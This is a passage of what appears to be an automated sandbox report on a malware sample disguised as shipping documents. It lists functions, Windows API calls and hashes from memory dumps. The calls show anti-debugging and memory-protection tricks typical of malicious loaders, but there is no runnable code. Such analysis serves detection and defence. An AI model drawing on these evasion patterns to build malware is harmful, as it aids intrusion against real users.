                                        • Opcode ID: 3a57111158f347d88dbde3e318525034193c73478da09152c3b71e7a4ee33219
                                        • Instruction ID: 299b3e836482dce4edfef7a201b6a9b5df19e80b8497da07d22598c361cd8f40
                                        • Opcode Fuzzy Hash: 3a57111158f347d88dbde3e318525034193c73478da09152c3b71e7a4ee33219
                                        • Instruction Fuzzy Hash: 881189908CC784EBEBF1A5204CA07FDAA940F12390F68016BDFA747D62D7094589F643
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F6E8D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: 8da5e78b45ba3259e74f4a851551b4e0eb0f43b966e1f854cb6da688d278e73d
                                        • Instruction ID: 972ea75a51e7a6c9bc0063c7994c4e2d0cfcc3bae35157c123c65da17fb87503
                                        • Opcode Fuzzy Hash: 8da5e78b45ba3259e74f4a851551b4e0eb0f43b966e1f854cb6da688d278e73d
                                        • Instruction Fuzzy Hash: B41134409CCB84EBEBE1A1204C647ADAEA40F02394FA801AACF9647D62C7094589E743
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F1369, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ProcessTerminate
                                        • String ID: E
                                        • API String ID: 560597551-3568589458
                                        • Opcode ID: a7042bd9f174767981e73d841fcf229dcf3904961f22066e1abc62cf50ef6e28
                                        • Instruction ID: e662a65662393fb7dde815cbb3147a7c89ceac4d10c94a2c375a2989d62bba47
                                        • Opcode Fuzzy Hash: a7042bd9f174767981e73d841fcf229dcf3904961f22066e1abc62cf50ef6e28
                                        • Instruction Fuzzy Hash: BB116D30888BC4D7EBF19A248D183DDBEA51F03358F2C019DC79D56C81C36A9449DB02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F6F64, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: 7cd2facb7a0f56371ceb54b1d2da360cfd03fdf71e3da8ef3b841ba9a5d1471d
                                        • Instruction ID: 2db93f42d00c04d3f71c601b8ebbf7592aa4917754bc7de428322469da721af8
                                        • Opcode Fuzzy Hash: 7cd2facb7a0f56371ceb54b1d2da360cfd03fdf71e3da8ef3b841ba9a5d1471d
                                        • Instruction Fuzzy Hash: 03113B40948FC5ABEBA1A5341C1478DEF645E13284FAC02EFCBD64AD63CB194846C743
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F6FDA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: 2e3f49c829c731ea3ca54aa31b0ccde70f79e1af6c3fa78176c11fc577f0601e
                                        • Instruction ID: 68d110143d9d8a053491e97c0c9c67644db30f1e5704cac786f8046f2d763f85
                                        • Opcode Fuzzy Hash: 2e3f49c829c731ea3ca54aa31b0ccde70f79e1af6c3fa78176c11fc577f0601e
                                        • Instruction Fuzzy Hash: D0117754548FC46BEBA2E6340C1439CAF795B13388FAC01EEDBAA4A952CB194945C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F13D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ProcessTerminate
                                        • String ID: E
                                        • API String ID: 560597551-3568589458
                                        • Opcode ID: 4f8f491b86c684efc5cc0084ecf55783096620d9542efed36453e227d7d04837
                                        • Instruction ID: 4f9944f24bd8f2327b0b816ea718b01065881d288898500916196b01098b50c6
                                        • Opcode Fuzzy Hash: 4f8f491b86c684efc5cc0084ecf55783096620d9542efed36453e227d7d04837
                                        • Instruction Fuzzy Hash: D001B620888BC0A7EB51D5244D087DDBF951F03354F6C01DDCAE927C82C35A544AD746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F140E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ProcessTerminate
                                        • String ID: E
                                        • API String ID: 560597551-3568589458
                                        • Opcode ID: acf120d23b60fe23971c50f7a1d980e9115bbb42ccf3be6738f634fcb142636d
                                        • Instruction ID: f5b0d94a89f99eca61fe01896eeaafd1d5f26f1e6e6b605c20c0edb5e31a81ec
                                        • Opcode Fuzzy Hash: acf120d23b60fe23971c50f7a1d980e9115bbb42ccf3be6738f634fcb142636d
                                        • Instruction Fuzzy Hash: E3014C10888BC477EB51D5284C097DDAF6A1F13398F6C02DD8AF96B982C75E548A8352
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F7044, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: 97c40d6632d0e94f9f99f3a13968977cd897a739af8d83432048ee78a7013708
                                        • Instruction ID: d3e0e42faa5ae6fb6ee3c9f3d0f460ed8de614f7eb9f9a8e8a6902162dade368
                                        • Opcode Fuzzy Hash: 97c40d6632d0e94f9f99f3a13968977cd897a739af8d83432048ee78a7013708
                                        • Instruction Fuzzy Hash: 7A015645508FC41BE761D6240C1438CAE641B12388FAC01EECAA64B992CB194945C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0875, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EnumWindows.USER32(020F08F0,?,00000000,?,?), ref: 020F08A0
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: EnumInformationThreadWindows
                                        • String ID: E
                                        • API String ID: 1954852945-3568589458
                                        • Opcode ID: ba9855ccf85225f453b77d0b039a068c45ead6e89bf3cba93b137e449561d71b
                                        • Instruction ID: 4d62ac0e09c2f5df255155477f4b5df4d672e98f34c7a73a20734c1ada8f4f73
                                        • Opcode Fuzzy Hash: ba9855ccf85225f453b77d0b039a068c45ead6e89bf3cba93b137e449561d71b
                                        • Instruction Fuzzy Hash: 82F09C74508BC56BEBA1D6748C2478C6FB55B03358FBC059DCAD98B5D2CB6A8886C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F418B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ProcessTerminate
                                        • String ID: E
                                        • API String ID: 560597551-3568589458
                                        • Opcode ID: c7361a2b9a919fcb68ee3c9a82f2434676c9ffe93234e1269cda25369c4b793c
                                        • Instruction ID: 25f7c39d2dd4930c9c63fe14d8c18d065b5de95b3c0743c83fa4397b53cb4448
                                        • Opcode Fuzzy Hash: c7361a2b9a919fcb68ee3c9a82f2434676c9ffe93234e1269cda25369c4b793c
                                        • Instruction Fuzzy Hash: 18F03755508BC41BFB62D6344C0974C6F745B13398FBC01DDCAAA8A5D3CB5E494BC701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F70A8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: 5a6dcf1012b5a947e36f9d97f86b133e0f924d679851f688560689844670ddcd
                                        • Instruction ID: 39c8aa740840680515eac1e5790fe35d30460203cae823e75e37b8219ac1e911
                                        • Opcode Fuzzy Hash: 5a6dcf1012b5a947e36f9d97f86b133e0f924d679851f688560689844670ddcd
                                        • Instruction Fuzzy Hash: F2E09B44544FC46BEBA1DA245C143CCEF741F12389FAC01EECB964E556C7698845CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F147C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ProcessTerminate
                                        • String ID: E
                                        • API String ID: 560597551-3568589458
                                        • Opcode ID: 225e9a0452f6209349a423476da9c3f6def9df7169e5a6dbc6526743179fce34
                                        • Instruction ID: ec23487852480ed7d5468f06768d068a29f4a9c887439bd82bbc27aa1acf757c
                                        • Opcode Fuzzy Hash: 225e9a0452f6209349a423476da9c3f6def9df7169e5a6dbc6526743179fce34
                                        • Instruction Fuzzy Hash: D6E06554448FC827EBA195200C0978C6F691B13358FBC02DD8BB95A4C2DA59488AC701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F70D9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: d1a011ad5cce4927d4f50230a905ed0e7d3f5443dc1c096de12490d585e0b111
                                        • Instruction ID: 8fced464ac1d2ecbc2c5bffbbff715bfc8ba330feff57a8915722dc6a161b2ce
                                        • Opcode Fuzzy Hash: d1a011ad5cce4927d4f50230a905ed0e7d3f5443dc1c096de12490d585e0b111
                                        • Instruction Fuzzy Hash: 01E0D880508FC827EBA1E6384C1828CAF741F133C9FBC01EECBE64A597C7194886C342
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F483F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,020F47A0,020F48B7,?,?), ref: 020F4875
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: E
                                        • API String ID: 823142352-3568589458
                                        • Opcode ID: 1f2eaaecfc1bcc4b95e3ae5f4d4691825cf213e05d08cfa67123eac65330f4c3
                                        • Instruction ID: 07a619dcdddd3faacc7790b5f5bbb1a82d60d8f23b135b521c80bd64c751e492
                                        • Opcode Fuzzy Hash: 1f2eaaecfc1bcc4b95e3ae5f4d4691825cf213e05d08cfa67123eac65330f4c3
                                        • Instruction Fuzzy Hash: C4E0BF90928FC82BFB72D6740C19B8C6E681B13348FAC02DED6F95A5C39A594882CB15
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F716B, Relevance: 1.7, APIs: 1, Instructions: 174libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 71ab9af2cf4e23c3dffb1287b01a58b49bc16726484a885e77ffe04e674c6301
                                        • Instruction ID: 9804141f06c0d095f99dcb23193a5a81c4df64cff5d359c7bad86bd7c8c70c31
                                        • Opcode Fuzzy Hash: 71ab9af2cf4e23c3dffb1287b01a58b49bc16726484a885e77ffe04e674c6301
                                        • Instruction Fuzzy Hash: 78513471AC8305EBDBE49E18C9A07FEB6A1AF58350F55412AEF4B47E20D7319844FA43
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F6DE7, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: ae492ef21c040aee1220d6bb93f78d9efbd7949acab555530012a9b636f17d08
                                        • Instruction ID: b19608af41531e7b011321000826d02441a24f5afdae340197eb4a20ab316178
                                        • Opcode Fuzzy Hash: ae492ef21c040aee1220d6bb93f78d9efbd7949acab555530012a9b636f17d08
                                        • Instruction Fuzzy Hash: 81012D915CC305EADEF125249DA4BFF91598F517A0E110127EF6743D35A7168148F943
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F4824, Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,020F47A0,020F48B7,?,?), ref: 020F4875
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 071e88b4563aaa8964ad7388022c27d7671e8d60d8a297dd159767c3a55d6731
                                        • Instruction ID: 7d7f73f48317728f33e96d2dc85a9dc5bed4083c5733cd7f41c8233475a9ba4d
                                        • Opcode Fuzzy Hash: 071e88b4563aaa8964ad7388022c27d7671e8d60d8a297dd159767c3a55d6731
                                        • Instruction Fuzzy Hash: 82F02B30794B056FF7B68CA58DE5BDB52429FD6B60F54823DFF46259C4D7A04841D101
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 020F89EE, Relevance: 1.5, Strings: 1, Instructions: 209nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                          • Part of subcall function 020F91CF: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,020F8B7B,00000040,020F09FC,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 020F91E8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                        • String ID: E
                                        • API String ID: 449006233-3568589458
                                        • Opcode ID: 9836205dda3833b25ca3e4ec1fe6fc6e7cfe564c063c692c8c4a1cf5e51b4042
                                        • Instruction ID: fa39f68347805b9b212edea37a6a78bc5165dec9027ec3f38199c2d0256237a9
                                        • Opcode Fuzzy Hash: 9836205dda3833b25ca3e4ec1fe6fc6e7cfe564c063c692c8c4a1cf5e51b4042
                                        • Instruction Fuzzy Hash: CC7129B05843418FDFE5CF2888947E97BD29F12320F58C29EDA964FAD6D3358486D712
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F8A85, Relevance: 1.4, Strings: 1, Instructions: 188nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                          • Part of subcall function 020F91CF: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,020F8B7B,00000040,020F09FC,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 020F91E8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationMemoryProtectThreadVirtual
                                        • String ID: E
                                        • API String ID: 675431017-3568589458
                                        • Opcode ID: 01ef24ef3716a0ab363679c0d0afcfbb7b9208ac1d656e47c17589969bd971cd
                                        • Instruction ID: 57d2c2be920d1fe67abd020c5816e9e82f34b3f8986c5fb08cd27bca7ba2f234
                                        • Opcode Fuzzy Hash: 01ef24ef3716a0ab363679c0d0afcfbb7b9208ac1d656e47c17589969bd971cd
                                        • Instruction Fuzzy Hash: 376107A05843818FDBE5CB3888947D97BE29F12320F58C29EDB964F6D7D3358486D712
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F2C7F, Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: E
                                        • API String ID: 0-3568589458
                                        • Opcode ID: 5d189bdf44e78cba640417b7a55659dc375debb019323daf687426fb37fd88c7
                                        • Instruction ID: 6e183943aa73f2b7778dd8a1e188900e554b640e0751ee9034ee543c30c83933
                                        • Opcode Fuzzy Hash: 5d189bdf44e78cba640417b7a55659dc375debb019323daf687426fb37fd88c7
                                        • Instruction Fuzzy Hash: ED418871680742EFD7E49E28CC50BD937A5BF12390F580279EEA9D7A81CB25D84ADB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F2FB8, Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: E
                                        • API String ID: 0-3568589458
                                        • Opcode ID: 0b04efc30e5e5b01eed5c57cdd3adc6c53f406a1cf8c5b232f69dfcd3a6b30b0
                                        • Instruction ID: 8154efe44b924e3d15cc27b7b8b08be8a2afacbe27a4fad737e0a9e8447e1d95
                                        • Opcode Fuzzy Hash: 0b04efc30e5e5b01eed5c57cdd3adc6c53f406a1cf8c5b232f69dfcd3a6b30b0
                                        • Instruction Fuzzy Hash: 4B315C34684780AFEFA25F604CA8BDD37926F02764F99429EDF451F5D1C7748481DA02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F2FFD, Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: E
                                        • API String ID: 0-3568589458
                                        • Opcode ID: 7bd069a3db0a6bc85077e5b670e308d2fa91b55fef1c84a3db4471bf82b9e8f8
                                        • Instruction ID: 525a49bcf7a168da96a2bcc37351d603566873db7514fc89bf3403019132409f
                                        • Opcode Fuzzy Hash: 7bd069a3db0a6bc85077e5b670e308d2fa91b55fef1c84a3db4471bf82b9e8f8
                                        • Instruction Fuzzy Hash: E7316B30684780AFEBA25F704CA9BDD3A916F03774F5843AEDF551F4D2C3A18481DA02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F7C4F, Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e72af338b1ea1ce032d136b6918e8f7936f08858ea3edec2c09b141bea5716b
                                        • Instruction ID: 4d50a36f369cc0227dbbcd9e2777bfa20e9ae6a870c432a2756f5fdd5064f08b
                                        • Opcode Fuzzy Hash: 5e72af338b1ea1ce032d136b6918e8f7936f08858ea3edec2c09b141bea5716b
                                        • Instruction Fuzzy Hash: F2F05E352813018FE79ADE14C5D0BA9B3F2AF64780F95845DDE4587A61C320D840DA63
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F421E, Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef9c707bb2b8b749fb830ba18f3a5586ffbf698288a033029581376a18c1d91a
                                        • Instruction ID: aa18c677f214ca209a1daa29e0d52b71557e75ffcea9935c4786e2a1f4f6e031
                                        • Opcode Fuzzy Hash: ef9c707bb2b8b749fb830ba18f3a5586ffbf698288a033029581376a18c1d91a
                                        • Instruction Fuzzy Hash: 94C04CB3751580CBEB99CA08C4A1B5573B6EB91544FC844A4F513CFA55C314ED84DB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F6CF0, Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 245aba01a7ad0c8e948011799d76d4ad93251f4637ded75c2352853db9ec6875
                                        • Instruction ID: b1d0c10aa20e0a0dfc479b2b5052591ca654722de80ddba30fd8ada25a637e78
                                        • Opcode Fuzzy Hash: 245aba01a7ad0c8e948011799d76d4ad93251f4637ded75c2352853db9ec6875
                                        • Instruction Fuzzy Hash: D3C04C32A95744CFCBC5CE06C250B5473F5AF40640F464590AD568BE52C325DD01D704
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Analysis Process: Shipping Documents (INV,PL,BL)_pdf.exe PID: 5268 Parent PID: 2540 Shipping Documents (INV,PL,BL)_pdf.exeCOMMON

                                        Executed Functions

                                        Function 00564522, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 005644CC
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID: 8$E
                                        • API String ID: 2706961497-577190275
                                        • Opcode ID: ffe972df29086bbc29ebaa45625465c5d6d71731466cf520dfa4c6f6f0a15033
                                        • Instruction ID: ff256a4585b7a1d5d093c8439d5d22eed54614d0fad44d914aebee67b57adb8e
                                        • Opcode Fuzzy Hash: ffe972df29086bbc29ebaa45625465c5d6d71731466cf520dfa4c6f6f0a15033
                                        • Instruction Fuzzy Hash: FA314A705047825FEB129A74C89979D7FA4AF13374F6803AEE9924B0E2D765C886CF41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00563246, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateThread.KERNELBASE(000000FE,00000000), ref: 0056327D
                                          • Part of subcall function 005632C6: RtlAddVectoredExceptionHandler.NTDLL(?,Function_0000151B), ref: 00563317
                                          • Part of subcall function 005632C6: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,?,00000000), ref: 005633D8
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual$ExceptionHandlerTerminateThreadVectored
                                        • String ID: E
                                        • API String ID: 2781483202-3568589458
                                        • Opcode ID: c7f35ab606ac8a11d1661e0ea3ca0afe754bfe41a0bbe505f2e82f61dabbdb4c
                                        • Instruction ID: e9b22bdc33b40df116c429b90d56e358dbfcd29eff5fc2562c7cdfb906d38080
                                        • Opcode Fuzzy Hash: c7f35ab606ac8a11d1661e0ea3ca0afe754bfe41a0bbe505f2e82f61dabbdb4c
                                        • Instruction Fuzzy Hash: 25216B746047816FEB209E54CC98BAD3E64BB13374FB802A9EA535B0E2C355C881CE12
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005632C6, Relevance: 4.6, APIs: 3, Instructions: 113nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlAddVectoredExceptionHandler.NTDLL(?,Function_0000151B), ref: 00563317
                                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,?,00000000), ref: 005633D8
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual$ExceptionHandlerVectored
                                        • String ID:
                                        • API String ID: 4193742754-0
                                        • Opcode ID: 90a6763ed2f7f998a57ed733ddf1f1db058e88b570a05f688586830e9b0acc31
                                        • Instruction ID: a5830e4824a0f0d45141c8671d9e7c1b217f4846759f8c68afb1ecc21034de3b
                                        • Opcode Fuzzy Hash: 90a6763ed2f7f998a57ed733ddf1f1db058e88b570a05f688586830e9b0acc31
                                        • Instruction Fuzzy Hash: 173101B4600302AFE710AF60C898BEA7FA4FF16374F604655E9528B1E2D7B4C880CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005697DC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
